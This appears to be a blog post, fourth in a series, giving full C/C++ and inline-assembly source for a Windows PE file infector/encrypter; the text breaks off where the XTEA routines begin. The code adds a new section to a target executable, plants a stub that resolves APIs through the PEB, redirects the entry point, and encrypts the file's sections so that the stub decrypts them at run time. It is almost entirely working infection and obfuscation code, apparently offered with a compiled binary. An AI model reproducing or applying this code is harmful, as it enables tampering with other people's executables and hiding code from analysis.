RCE Endeavors 😅

April 23, 2011

Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

The full source code is reproduced below. The archive at the end of this post contains the source code and a compiled executable. 

Main.cpp

#include <Windows.h>
#include <wchar.h>
#include <stdio.h>
#include "Injector.h"
#include "Encrypter.h"
 
//Emits the single byte x directly into the instruction stream (MSVC inline-asm _emit).
//Used at the end of injection_stub to embed string literals inside the stub's own code.
#define BB(x) __asm _emit x
 
//Inline-asm string comparison built on the stub-local get_string_length/strings_equal labels.
//Measures str1 with get_string_length, then calls strings_equal(str2, str1, length of str1),
//so only the first strlen(str1) bytes of str2 are compared. strings_equal leaves 1 in EAX on
//a match and 0 otherwise. str1 must be usable as a push operand; str2 is loaded through EAX.
//Only usable inside injection_stub, where those labels are defined.
#define STRING_COMPARE(str1, str2) \
    __asm push str1 \
    __asm call get_string_length \
    __asm push eax \
    __asm push str1 \
    __asm mov eax, str2 \
    __asm push eax \
    __asm call strings_equal
 
#pragma code_seg(".inject")
///////////////////////////////////////////////////////////////////
//Stub whose bytes main() copies into the new section of the target file.
//Flow: save registers -> read the module list from the PEB -> take the DllBase of entry 0
//(the image) and entry 2 (assumed to be kernel32.dll) -> decrypt_sections -> jump to
//image base + 0xCCDDEEFF, a placeholder that write_stub_entry_point() overwrites.
//The function is naked: every frame below is hand-written and the helper routines are
//reached by label (call/jmp), never through a compiler-generated call.
///////////////////////////////////////////////////////////////////
void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                  //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200          //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list    //Get PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }
    __asm { //Decrypt all sections
        push kernel32_image_base
        push target_image_base
        call decrypt_sections
    }
    //Any additional code can go here
    __asm { //Epilogue, stub exit point
        mov eax, target_image_base
        add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
        mov esp, ebp
        //After "mov esp, ebp": [esp] is the saved EBP and the pushad frame follows it,
        //so [esp+0x20] is the slot popad reloads into EAX
        mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
        pop ebp
        popad                   //Restore thread context, with OEP in EAX
        jmp eax                 //Jump to OEP
    }
 
    ///////////////////////////////////////////////////////////////////
    //Gets the module list
    //Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_module_list:       
            mov eax, fs:[0x30]  //PEB
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the DllBase member of the InLoadOrderModuleList structure
    //Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
    //Callee pops both arguments (ret 0x8); result in EAX, ECX is used as the loop counter
    //NOTE(review): for index 0 the code jumps to "done" before EAX is loaded from [ebp+0x8];
    //it only works because the caller still has the list pointer in EAX at that point
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_dll_base:
        push ebp
        mov ebp, esp
        cmp [ebp+0xC], 0x0      //Initial zero check
        je done
        mov ecx, [ebp+0xC]      //Set loop index
        mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
        traverse_list:
            mov eax, [eax]      //Go to next entry
        loop traverse_list
        done:
            mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA->InLoadOrderModuleList.DllBase
            mov esp, ebp
            pop ebp
            ret 0x8
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the length of the string passed as the parameter
    //Call as int get_string_length(char *str)
    //Length (terminator not counted) is returned in EAX; EDI is overwritten
    //NOTE: returns with a plain retn, so the pushed argument stays on the stack; the
    //callers in this file reclaim it through their "mov esp, ebp" epilogues
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_string_length:
        push ebp
        mov ebp, esp
        mov edi, [ebp+0x8]      //String held here
        mov eax, 0x0            //EAX holds size of the string
        counting_loop:
            cmp byte ptr[edi], 0x0//Current byte is null-terminator?
            je string_done      //Done, leave loop
            inc edi             //Go to next character
            inc eax             //size++
            jmp counting_loop
        string_done:
            mov esp, ebp
            pop ebp
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //String comparison function, checks for equality of two strings
    //Call as bool strings_equal(char *check_string, char *known_string, int known_string_length)
    //Compares exactly known_string_length bytes, so a check_string that merely starts with
    //known_string also compares equal. Returns 1/0 in EAX, overwrites ESI/EDI/ECX, pops its
    //three arguments (ret 0xC)
    ///////////////////////////////////////////////////////////////////
    __asm {
    strings_equal:
        push ebp
        mov ebp, esp
        mov eax, 0x0            //Assume unequal
        cld                     //Forward comparison
        mov esi, [ebp+0x8]      //ESI gets check_string
        mov edi, [ebp+0xC]      //EDI gets known_string
        mov ecx, [ebp+0x10]     //ECX gets known_string_length
        repe cmpsb              //Start comparing
        jne end
        mov eax, 0x1            //Strings equal
    end:
        mov esp, ebp
        pop ebp
        ret 0xC
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Implementation of GetProcAddress
    //Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
    //Walks the export name table of the module at hModule and returns the address of the
    //first name that matches under STRING_COMPARE; pops both arguments (ret 0x8)
    //NOTE(review): function_address is never initialised, so EAX is indeterminate when no
    //name matches
    ///////////////////////////////////////////////////////////////////
    get_proc_address:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        PIMAGE_DOS_HEADER kernel32_dos_header;
        PIMAGE_NT_HEADERS kernel32_nt_headers;
        PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
        unsigned short *ordinal_table;
        unsigned long *function_table;
        FARPROC function_address;
        int function_names_equal;
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov kernel32_dos_header, eax
            mov function_names_equal, 0x0
        }
        kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
        kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
            kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
            char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
                + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
            STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
            __asm mov function_names_equal, eax
            if(function_names_equal == 1) {
                //Name index -> ordinal -> function RVA, rebased onto the module base
                ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
                function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
                function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
                break;
            }
        }
        __asm {
            mov eax, function_address
            mov esp, ebp
            pop ebp
            ret 0x8
        }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
    //Call as void decrypt_sections(void *image_base, void *kernel32_base)
    //Resolves VirtualProtect through get_proc_address, then runs the XTEA decryption rounds
    //in place over every 8-byte block of each non-excluded section. Block layout and key
    //must stay in step with encrypt_file() in Encrypter.cpp
    ///////////////////////////////////////////////////////////////////
    decrypt_sections:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
            PDWORD lpflOldProtect);
        char *str_virtualprotect;
        char *str_section_name;
        char *str_rdata_name;
        char *str_rsrc_name;
        PIMAGE_DOS_HEADER target_dos_header;
        int section_offset;
        int section_names_equal;
        unsigned long old_protections;
        pVirtualProtect virtualprotect_addr;
        //Each jmp lands on a "call <label>back" placed directly in front of the string bytes
        //at the end of the stub; the return address pushed by that call is the address of
        //the string, which is popped into ESI here
        __asm { //String initializations
            jmp virtualprotect
            virtualprotectback:
                pop esi
                mov str_virtualprotect, esi
            jmp section_name
            section_nameback:
                pop esi
                mov str_section_name, esi
            jmp rdata_name
            rdata_nameback:
                pop esi
                mov str_rdata_name, esi
            jmp rsrc_name
            rsrc_nameback:
                pop esi
                mov str_rsrc_name, esi
        }
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov target_dos_header, eax
            mov section_offset, 0x0
            mov section_names_equal, 0x0
            push str_virtualprotect
            push [ebp+0xC]
            call get_proc_address
            mov virtualprotect_addr, eax
        }
        PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
        for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
            //Section headers are located as e_lfanew + sizeof(IMAGE_NT_HEADERS) + j * header size
            section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
                (sizeof(IMAGE_SECTION_HEADER) * j));
            PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
            //The header pointer is passed as the string to check: the comparison reads the
            //bytes at the start of the header. section_names_equal ends up as the number of
            //excluded names that matched
            STRING_COMPARE(str_section_name, section_header)
            __asm mov section_names_equal, eax
            STRING_COMPARE(str_rdata_name, section_header)
            __asm add section_names_equal, eax
            STRING_COMPARE(str_rsrc_name, section_header)
            __asm add section_names_equal, eax
            if(section_names_equal == 0) {
                unsigned char *current_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
                unsigned char *last_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                    + section_header->SizeOfRawData);
                const unsigned int num_rounds = 32;
                const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
                for(current_byte; current_byte < last_byte; current_byte += 8) {
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                    //Each 32-bit half of the block is assembled most-significant byte first
                    unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                        (*(current_byte+2) << 8) | *(current_byte+3);
                    unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                        (*(current_byte+6) << 8) | *(current_byte+7);
                    unsigned int full_block[] = {block1, block2};
                    unsigned int delta = 0x9E3779B9;
                    unsigned int sum = (delta * num_rounds);
                    //Same round function as decrypt() in Encrypter.cpp
                    for (unsigned int i = 0; i < num_rounds; ++i) {
                        full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                        sum -= delta;
                        full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                    }
                    //NOTE(review): the protection is "restored" before the decrypted bytes are
                    //written back below, and the call passes NULL for lpflOldProtect, which the
                    //Win32 documentation lists as a failure condition - so the page presumably
                    //stays writable and the stores succeed. Confirm before changing either part
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, NULL);
                    *(current_byte+3) = (full_block[0] & 0x000000FF);
                    *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                    *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                    *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                    *(current_byte+7) = (full_block[1] & 0x000000FF);
                    *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                    *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                    *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                }
            }
            section_names_equal = 0;
        }
        __asm {
            mov esp, ebp
            pop ebp
            ret 0x8
        }
 
    //String table embedded in the stub. Each entry is a call back into decrypt_sections
    //followed by the raw, NUL-terminated characters emitted with BB()
    __asm {
    virtualprotect:
        call virtualprotectback
        BB('V') BB('i') BB('r') BB('t') BB('u') BB('a') BB('l')
        BB('P') BB('r') BB('o') BB('t') BB('e') BB('c') BB('t') BB(0)
    rdata_name:
        call rdata_nameback
        BB('.') BB('r') BB('d') BB('a') BB('t') BB('a') BB(0)
    rsrc_name:
        call rsrc_nameback
        BB('.') BB('r') BB('s') BB('r') BB('c') BB(0)
    section_name:
        call section_nameback
        BB('.') BB('i') BB('n') BB('j') BB('e') BB('c') BB('t') BB(0)
        //End-of-stub marker: get_stub_size() scans for four consecutive 0xCC bytes, which
        //these four instructions are presumably assembled to
        int 0x3                 //Function signature
        int 0x3
        int 0x3
        int 0x3
    }
}
#pragma code_seg()
#pragma comment(linker, "/SECTION:.inject,re")
 
//Converts the first `length` bytes of the ANSI string `str` (CP_ACP) into a newly
//allocated, NUL-terminated wide string.
//  str    - source string; must contain at least length + 1 readable bytes
//  length - number of characters to convert, terminator not included
//Returns the converted string, which the caller releases with free(), or NULL when the
//size query, the allocation or the conversion fails (including length == 0).
wchar_t *convert_to_unicode(char *str, unsigned int length) {
    if(str == NULL)
        return NULL;
    //Size query; length + 1 reserves room for the terminator
    int wstr_length = MultiByteToWideChar(CP_ACP, 0, str, (length + 1), NULL, 0);
    if(wstr_length <= 0)
        return NULL;
    wchar_t *wstr = (wchar_t *)malloc(wstr_length * sizeof(wchar_t));
    if(wstr == NULL)
        return NULL;
    //Zero-fill only after the allocation is known to be valid; this also provides the
    //terminator, because the conversion below writes `length` characters only
    wmemset(wstr, 0, wstr_length);
    int written = MultiByteToWideChar(CP_ACP, 0, str, length, wstr, wstr_length);
    if(written > 0)
        return wstr;
    free(wstr); //Conversion failed: do not leak the buffer
    return NULL;
}
 
int main(int argc, char* argv[]) {
    if(argc != 2) {
        printf("Usage: ./%s <target>\n", argv[0]);
        return -1;
    }
    wchar_t *target_file_name = convert_to_unicode(argv[1], strlen(argv[1]));
    if(target_file_name == NULL) {
        printf("Could not convert %s to unicode\n", argv[1]);
        return -1;
    }
    pfile_info target_file = file_info_create();
    void (*stub_addr)(void) = injection_stub;
    unsigned int stub_size = get_stub_size(stub_addr);
    unsigned int stub_size_aligned = 0;
    bool map_file_success = map_file(target_file_name, stub_size, false, target_file);
    if(map_file_success == false) {
        wprintf(L"Could not map target file\n");
        return -1;
    }
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    stub_size_aligned = align_to_boundary(stub_size, nt_headers->OptionalHeader.SectionAlignment);
    const char *section_name = ".inject";
    file_info_destroy(target_file);
    target_file = file_info_create();
    (void)map_file(target_file_name, stub_size_aligned, true, target_file);
    PIMAGE_SECTION_HEADER new_section = add_section(section_name, stub_size_aligned, target_file->file_mem_buffer);
    if(new_section == NULL) {
        wprintf(L"Could not add new section to file");
        return -1;
    }
    write_stub_entry_point(nt_headers, stub_addr);
    copy_stub_instructions(new_section, target_file->file_mem_buffer, stub_addr);
    change_file_oep(nt_headers, new_section);
    encrypt_file(nt_headers, target_file, section_name);
    int flush_view_success = FlushViewOfFile(target_file->file_mem_buffer, 0);
    if(flush_view_success == 0)
        wprintf(L"Could not save changes to file");
    file_info_destroy(target_file);
    return 0;
}

Injector.cpp

#include "Injector.h"
#include <stdio.h>
 
//Assumes malloc won't fail
//Allocates a zero-initialised file_info (all handles and the buffer pointer are NULL).
//Returns NULL if the allocation fails; release with file_info_destroy().
pfile_info file_info_create(void) {
    //calloc zero-fills, and unlike malloc + memset never touches a NULL pointer
    return (pfile_info)calloc(1, sizeof(file_info));
}
 
//Assumes everything is valid, doesn't report error code
//Releases everything a file_info owns: unmaps the view, closes the file and mapping
//handles, then frees the structure itself. Members that are still NULL are skipped and a
//NULL argument is ignored. Errors from the Win32 calls are not reported.
//The caller's pointer is dangling afterwards and must not be reused.
void file_info_destroy(pfile_info mapped_file_info) {
    if(mapped_file_info == NULL)
        return;
    if(mapped_file_info->file_mem_buffer != NULL)
        UnmapViewOfFile(mapped_file_info->file_mem_buffer);
    if(mapped_file_info->file_handle != NULL)
        CloseHandle(mapped_file_info->file_handle);
    if(mapped_file_info->file_map_handle != NULL)
        CloseHandle(mapped_file_info->file_map_handle);
    free(mapped_file_info);
}
 
//Rounds `address` up to the next multiple of `boundary`.
//A value that is already aligned is returned unchanged; a boundary of 0 means "no
//alignment" and returns `address` as is instead of dividing by zero.
//Deliberately not inline: Injector.h declares this as an ordinary external function and
//Main.cpp calls it, so the definition has to be emitted from this translation unit.
unsigned int align_to_boundary(unsigned int address, unsigned int boundary) {
	if(boundary == 0)
		return address;
	return (((address + boundary - 1) / boundary) * boundary);
}
//Returns the number of bytes between stub_addr and the first run of four 0xCC bytes,
//i.e. the offset of the end-of-stub marker. A NULL stub_addr yields 0.
//The scan has no upper bound: the marker must be present in the memory that is passed in.
unsigned int get_stub_size(void* stub_addr) {
    if(stub_addr == NULL)
        return 0;
    const unsigned char *cursor = (const unsigned char *)stub_addr;
    const char *end_marker = "\xCC\xCC\xCC\xCC";
    unsigned int offset = 0;
    for(;;) {
        if(memcmp(cursor + offset, end_marker, sizeof(int)) == 0)
            break;
        ++offset;
    }
    return offset;
}
 
//Opens file_name for exclusive read/write access and maps it into memory.
//  file_name        - path of an existing file
//  stub_size        - extra bytes to grow the file by; used only when append_mode is true
//  append_mode      - when true the mapping (and therefore the file) is extended by
//                     stub_size + sizeof(DWORD_PTR) bytes
//  mapped_file_info - receives the file handle, mapping handle and view on success
//Returns true on success. On failure a message is printed, every handle opened here is
//closed again and mapped_file_info is left untouched.
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        CloseHandle(file_handle); //Was leaked on this path
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    //Creating a mapping larger than the file grows the file on disk to file_size
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}
 
//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
//Appends a new readable/executable code section header to the PE image mapped at
//image_addr.
//  section_name - name of the new section; at most 8 characters are stored
//  section_size - size of the section (stored as VirtualSize; raw size is this value
//                 rounded up to SectionAlignment)
//  image_addr   - start of the mapped file (the DOS header)
//The new section is placed after the last existing one, both in the file and in memory;
//SizeOfImage and NumberOfSections are updated accordingly.
//Returns the new header, or NULL when the headers are not a valid 32-bit PE image, the
//image has no sections, or the header area has no room for another section header.
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    if(section_name == NULL || image_addr == NULL)
        return NULL;
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    if(nt_headers->FileHeader.NumberOfSections == 0) {
        //last_section below would point in front of the section table
        wprintf(L"Image at %p has no sections", image_addr);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    //The new header must still lie inside the header area; otherwise writing it would
    //overwrite the raw data of the first section
    DWORD_PTR header_bytes_needed = (DWORD_PTR)(new_section + 1) - (DWORD_PTR)image_addr;
    if(header_bytes_needed > nt_headers->OptionalHeader.SizeOfHeaders) {
        wprintf(L"No room for another section header in %p", image_addr);
        return NULL;
    }
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    //Copy at most 8 characters and stop at the terminator, so names shorter than 8
    //bytes are not over-read; the remainder stays zero from the memset above
    for(int i = 0; i < name_max_length && section_name[i] != '\0'; ++i)
        new_section->Name[i] = (BYTE)section_name[i];
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}
 
//Copies the stub's bytes (everything in front of its end marker, as measured by
//get_stub_size) to the raw-data position of `section` inside the mapped file.
//  section    - header of the section that receives the stub
//  image_addr - start of the mapped file
//  stub_addr  - first byte of the stub in this process
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    const unsigned int bytes_to_copy = get_stub_size(stub_addr);
    unsigned char *destination = (unsigned char *)image_addr;
    destination += section->PointerToRawData;
    memcpy(destination, stub_addr, bytes_to_copy);
}
 
//Points the image's entry point at the start of `section`.
//The section's file offset is translated to a virtual address through the first section
//whose raw-data range contains it, and AddressOfEntryPoint receives that address minus
//ImageBase. When no section contains the offset, the untranslated offset minus ImageBase
//is stored.
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int entry_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER candidate = IMAGE_FIRST_SECTION(nt_headers);
    PIMAGE_SECTION_HEADER table_end = candidate + nt_headers->FileHeader.NumberOfSections;
    for(; candidate != table_end; ++candidate) {
        const unsigned int raw_begin = candidate->PointerToRawData;
        const unsigned int raw_end = raw_begin + candidate->SizeOfRawData;
        if(entry_address < raw_begin || entry_address >= raw_end)
            continue;
        //File offset -> offset inside the section -> absolute virtual address
        entry_address -= raw_begin;
        entry_address += (nt_headers->OptionalHeader.ImageBase + candidate->VirtualAddress);
        break;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  entry_address - nt_headers->OptionalHeader.ImageBase;
}
 
//Patches the stub in THIS process: the first occurrence of the placeholder bytes
//FF EE DD CC (0xCCDDEEFF, little-endian) is overwritten with the image's current
//AddressOfEntryPoint, so it must run before change_file_oep() redirects the entry point.
//  nt_headers - NT headers of the mapped target image
//  stub_addr  - first byte of the stub; nothing happens when either argument is NULL
//The search has no upper bound: the placeholder must still be present, i.e. the stub can
//be patched only once per process.
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr) {
    if(nt_headers == NULL || stub_addr == NULL)
        return;
    const char *signature = "\xFF\xEE\xDD\xCC";
    unsigned int index = 0;
    while(memcmp(((unsigned char *)stub_addr + index), signature, sizeof(int)) != 0) {
        ++index;
    }
    unsigned char *patch_site = (unsigned char *)stub_addr + index;
    DWORD old_protections = 0;
    //The stub lives in a read/execute section, so it has to be made writable first
    if(VirtualProtect(patch_site, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &old_protections) == 0) {
        wprintf(L"Could not make stub writable");
        return;
    }
    memcpy(patch_site, &nt_headers->OptionalHeader.AddressOfEntryPoint, sizeof(DWORD));
    //VirtualProtect fails when lpflOldProtect is NULL, so a throw-away variable is
    //required for the original protection to actually be restored
    DWORD previous_protections = 0;
    VirtualProtect(patch_site, sizeof(DWORD), old_protections, &previous_protections);
}

Injector.h

#pragma once
#include <Windows.h>
 
//Bookkeeping for one memory-mapped file. Filled in by map_file() on success and released
//by file_info_destroy(); file_info_create() returns it with every member zeroed.
typedef struct {
    void *file_handle;              //Handle returned by CreateFile
    void *file_map_handle;          //Handle returned by CreateFileMapping
    unsigned char *file_mem_buffer; //Base of the view returned by MapViewOfFile
} file_info, *pfile_info;
 
//Allocates a zeroed file_info
pfile_info file_info_create(void);
//Unmaps the view, closes both handles and frees the structure
void file_info_destroy(pfile_info mapped_file_info);
//Rounds address up to the next multiple of boundary
unsigned int align_to_boundary(unsigned int address, unsigned int boundary);
//Number of bytes between stub_addr and the first run of four 0xCC bytes
unsigned int get_stub_size(void* stub_addr);
//Opens and maps file_name; in append mode the mapping is grown by stub_size + sizeof(DWORD_PTR)
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info);
//Appends a read/execute code section header to the mapped image; NULL on failure
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr);
//Copies the stub's bytes to the raw-data position of section
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr);
//Redirects AddressOfEntryPoint to the start of section
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section);
//Overwrites the FF EE DD CC placeholder inside the stub with the current AddressOfEntryPoint
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr);

Encrypter.cpp

#include "Encrypter.h"
#include <stdio.h>
 
//Encrypts, in place in the mapped file, the raw data of every section except ".rdata",
//".rsrc" and excluded_section_name.
//  nt_headers            - NT headers of the mapped image (must belong to target_file)
//  target_file           - mapping whose file_mem_buffer holds the file contents
//  excluded_section_name - additional section to leave untouched (the stub's own section)
//A section is excluded when its name STARTS WITH one of the excluded names. This mirrors
//the decryption stub, whose STRING_COMPARE checks only strlen(excluded name) bytes, so
//both sides always agree on which sections are encrypted.
//Data is processed in 8-byte blocks with 32 XTEA rounds; each 32-bit half is read and
//written most-significant byte first. The loop runs while the block START is inside the
//section, exactly like the stub's loop, so SizeOfRawData is expected to be a multiple of 8.
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    const size_t excluded_count = sizeof(excluded_sections)/sizeof(excluded_sections[0]);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i, ++current_section) {
        bool skip_section = false;
        for(size_t j = 0; j < excluded_count && !skip_section; ++j) {
            const char *excluded_name = excluded_sections[j];
            if(excluded_name == NULL || excluded_name[0] == '\0')
                continue;
            //Name is a fixed 8-byte field that is NOT NUL-terminated when all 8 bytes are
            //used, so the comparison is bounded; only equality with 0 is meaningful for
            //strncmp, its non-zero results are not limited to +/-1
            size_t compare_length = strlen(excluded_name);
            if(compare_length > IMAGE_SIZEOF_SHORT_NAME)
                compare_length = IMAGE_SIZEOF_SHORT_NAME;
            skip_section = (strncmp(excluded_name, (const char *)current_section->Name, compare_length) == 0);
        }
        if(skip_section)
            continue;
        unsigned char *section_start = 
            (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
        unsigned char *section_end = section_start + current_section->SizeOfRawData;
        const unsigned int num_rounds = 32;
        const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
        for(unsigned char *k = section_start; k < section_end; k += 8) {
            unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
            unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
            unsigned int full_block[] = {block1, block2};
            encrypt(num_rounds, full_block, key);
            //Swap so that the memcpy below stores each half most-significant byte first
            full_block[0] = swap_endianess(full_block[0]);
            full_block[1] = swap_endianess(full_block[1]);
            memcpy(k, full_block, sizeof(full_block));
        }
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
//XTEA encryption of one 64-bit block, in place.
